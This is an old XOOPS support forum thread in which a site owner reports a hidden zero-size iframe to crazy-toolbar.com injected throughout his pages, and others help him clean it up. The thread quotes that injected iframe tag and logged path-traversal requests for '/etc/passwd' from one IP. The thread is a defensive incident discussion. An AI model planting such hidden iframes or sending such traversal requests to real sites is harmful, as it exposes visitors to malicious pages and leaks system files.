1
danielillo
Hacked by Crazy-toolbar.com ???
  • 2005/6/19 10:45

  • danielillo

  • Just popping in

  • Posts: 6

  • Since: 2005/4/18


Hi,

I think i've been hacked, I've this code:

table><IFRAME SRC=http://www.crazy-toolbar.com/home/Volume/ WIDTH=0 BORDER=0 HEIGHT=0>


all around my web and I don't know how to get rid of it.


Any ideas?


By the way i' running XOOPS 2.0.10




Thanks,


Daniel.

2
Bender
Re: Hacked by Crazy-toolbar.com ???
  • 2005/6/19 11:00

  • Bender

  • Home away from home

  • Posts: 1899

  • Since: 2003/3/10


Got any recent backups for the files?
(if not you might need to download them all and do a search and replace over all files to get rid of it. You can try to user Powergrep if necessary it has a 30day testversion so you can check it out)


Contact your hoster to see if this is a general problem and affects other sites on the server.

Might be some security hole like php version not up to date on the server for example.

3
jdseymour
Re: Hacked by Crazy-toolbar.com ???

Where is this code entered into your site exactly?

4
danielillo
Re: Hacked by Crazy-toolbar.com ???
  • 2005/6/19 11:04

  • danielillo

  • Just popping in

  • Posts: 6

  • Since: 2005/4/18


I've updated all my modules and now I only can find this iframe at the end of my site but before doing it, it was about 14 times on the main page.

Now I'm downloading all my files to see which ones have been modified with this code....

5
danielillo
Re: Hacked by Crazy-toolbar.com ???
  • 2005/6/19 11:12

  • danielillo

  • Just popping in

  • Posts: 6

  • Since: 2005/4/18


More things...

I installed XOOPS Protector the first day I started with the web and it has logged this:

7/6/2005 14:24:25 Invitados 24.194.25.74 Java/1.4.1_05 ParentDir Doubtful file specification '../../../../../../../../../../../../../../../../../etc/passwd' found.


Maybe an exploit?

6
jdseymour
Re: Hacked by Crazy-toolbar.com ???

I got this also:

Quote:
2005/6/7 7:12:59 Guests 24.194.25.74
Java/1.4.1_05 ParentDir Doubtful file specification '../../../../../../../../../../../../../../../../../etc/passwd' found.


Protector log. Looked interesting enough to make sure the IP was banned. I see it is the same IP also.

7
danielillo
Re: Hacked by Crazy-toolbar.com ???
  • 2005/6/19 11:53

  • danielillo

  • Just popping in

  • Posts: 6

  • Since: 2005/4/18


Yes, I just banned the IP.

How did you get rid of all those annoying Iframes?



Thanks and excuse my english (I'm from Spain ;) )

8
jdseymour
Re: Hacked by Crazy-toolbar.com ???

Did not get any.

The IP block belongs to Road Runner here in the US. But of course the IP could be spoofed.

9
danielillo
Re: Hacked by Crazy-toolbar.com ???
  • 2005/6/19 12:10

  • danielillo

  • Just popping in

  • Posts: 6

  • Since: 2005/4/18


I think I've deleted it!!!!


I've deleted all files but index.html in my cache and templates_c directory through my hosting control panel (I couldn't do it with FTP), updated system and forum modules and it seems to work now....

10
CeBepuH
Re: Hacked by Crazy-toolbar.com ???
  • 2005/6/19 14:00

  • CeBepuH

  • Not too shy to talk

  • Posts: 128

  • Since: 2002/6/10


Quote:

7/6/2005 14:24:25 Invitados 24.194.25.74 Java/1.4.1_05 ParentDir Doubtful file specification '../../../../../../../../../../../../../../../../../etc/passwd' found.


Interesting. I had exactly the same visit the same day in my Protector logs. But I never got any iframes.

Login

Who's Online

341 user(s) are online (284 user(s) are browsing Support Forums)


Members: 0


Guests: 341


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits